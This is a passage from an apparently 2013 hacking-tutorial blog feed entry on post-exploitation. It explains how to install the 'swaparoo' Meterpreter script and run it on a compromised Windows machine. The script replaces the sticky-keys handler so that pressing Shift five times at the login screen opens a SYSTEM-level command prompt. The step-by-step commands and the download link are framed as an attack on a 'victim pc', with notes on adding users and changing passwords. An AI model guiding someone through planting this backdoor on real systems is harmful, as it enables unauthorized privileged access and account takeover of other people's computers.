&lt;b&gt;run multi_console_command -rc /root/msf4/logs/scripts/getgui/clean_up_what_ever_file_name.rc&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
(2)Now we use another method; it`s backdoor.But it`s physical backdoor; so you have to present at victim pc to get access.But backdoor is created remotely.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
Download swaparoo script from &lt;a href=&quot;https://github.com/Un0wnX/swaparoo/blob/master/swaparoo.rb&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; .&lt;br /&gt;
&lt;br /&gt;
Put it into the /opt/msf/scripts/meterpreter folder&lt;br /&gt;
&lt;br /&gt;
After that get meterpreter shell using any method.&lt;br /&gt;
&lt;br /&gt;
Now type &lt;b&gt;run swaparoo -h&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMzBR8Y3ej0MFHPww6NdJo4kjyeVXrAP8rrxUHVa_0FWajhZYHCCTvprL-UxJLLHL19D4b4ISP11-JphLqxeAwfFCCBT07S1tQ0_KTcW-k6nNu7pITVOgjzNIUbzPNEyxiNTSPehsNDsRF/s1600/reenshot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;swaparoo-backdoor&quot; border=&quot;0&quot; height=&quot;128&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMzBR8Y3ej0MFHPww6NdJo4kjyeVXrAP8rrxUHVa_0FWajhZYHCCTvprL-UxJLLHL19D4b4ISP11-JphLqxeAwfFCCBT07S1tQ0_KTcW-k6nNu7pITVOgjzNIUbzPNEyxiNTSPehsNDsRF/s320/reenshot.jpeg&quot; title=&quot;swaparoo-backdoor-1&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now type&lt;b&gt;&amp;nbsp; run swaparoo&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglT9sd7iGJlya-Tjm6z4_GOvBr78x9iDDnwPQBInkJq_Nx34Vug8reDVGttHk8LUK1b27HNwBBbhoVza5kOZ0OfCDUm_2Hr6rhkxh12l7XXQtz6YPLA9QBTeFK8a7VL4nBB09eq1c6PcG7/s1600/Sot.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;swaparoo-backdoor&quot; border=&quot;0&quot; height=&quot;108&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglT9sd7iGJlya-Tjm6z4_GOvBr78x9iDDnwPQBInkJq_Nx34Vug8reDVGttHk8LUK1b27HNwBBbhoVza5kOZ0OfCDUm_2Hr6rhkxh12l7XXQtz6YPLA9QBTeFK8a7VL4nBB09eq1c6PcG7/s320/Sot.jpeg&quot; title=&quot;swaparoo-backdoor-2&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
As you can see in image last line is&amp;nbsp; &quot;[+] Press Shift key 5 times at Login Screen and you should be greeted by a shell!&quot;&lt;br /&gt;
&lt;br /&gt;
So when you restart victim pc &amp;amp; login screen appear ; just press shift key 5 times (From victim `s keyboard)you get cmd with system privilege.Now from cmd you can do anything like remove user,add user, change password.&lt;br /&gt;
&lt;br /&gt;
If you want to remove this backdoor then type following command&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;run swaparoo -r&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What`s limitation?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Anyone who is physically&amp;nbsp; present at terminal can get system cmd just by pressing keys.Because it does not ask for credentials.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/5331145277506785871/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5331145277506785871'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/5331145277506785871'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/08/post-exploitation-swaparoo-backdoor.html' title='Post exploitation &amp; swaparoo backdoor.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv-5dXQejKZ5Oj3PP_qmWpWsNcJREQ9uZBhx48CpcovB2-Gqh9gAmaOqrZkQe3WmWWCCgD3GNaAfewTr7G7Cb3_72w1B_70aUKB-8am4gmRXgKSGPrqGQsjNXt0C_8ql26PxqMDdS-rZSi/s72-c/Screenshot.jpeg" height="72" width="72"/><thr:total>0</thr:total></entry></feed>